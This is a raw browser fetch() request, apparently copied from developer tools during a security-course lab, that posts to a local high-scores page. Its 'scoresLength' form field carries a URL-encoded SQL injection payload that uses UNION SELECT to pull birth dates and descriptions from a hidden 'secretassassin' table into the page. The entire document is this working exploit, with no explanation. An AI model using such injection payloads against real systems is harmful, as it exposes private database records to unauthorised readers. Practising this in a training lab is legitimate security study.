fetch("http://localhost:8000/highscores/", {
  "headers": {
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "accept-language": "en-US,en;q=0.9",
    "cache-control": "max-age=0",
    "content-type": "application/x-www-form-urlencoded",
    "sec-ch-ua": "\"Google Chrome\";v=\"87\", \" Not;A Brand\";v=\"99\", \"Chromium\";v=\"87\"",
    "sec-ch-ua-mobile": "?0",
    "sec-fetch-dest": "document",
    "sec-fetch-mode": "navigate",
    "sec-fetch-site": "same-origin",
    "sec-fetch-user": "?1",
    "upgrade-insecure-requests": "1"
  },
  "referrer": "http://localhost:8000/highscores/",
  "referrerPolicy": "same-origin",
  "body": "csrfmiddlewaretoken=IuizTmqHcXlLhZenDt0kSnj7IOXZfwWB9FHoZzMKcdzAgLMSaZK2vM54fLNFNccU&scoresLength=2%27%29+UNION+SELECT+*+FROM+%28SELECT+id%2C+dateOfBirth+AS+date%2C+id+AS+player%2C+description+AS+score+FROM+cybersecuritybase_secretassassin%29%3B+--",
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
});
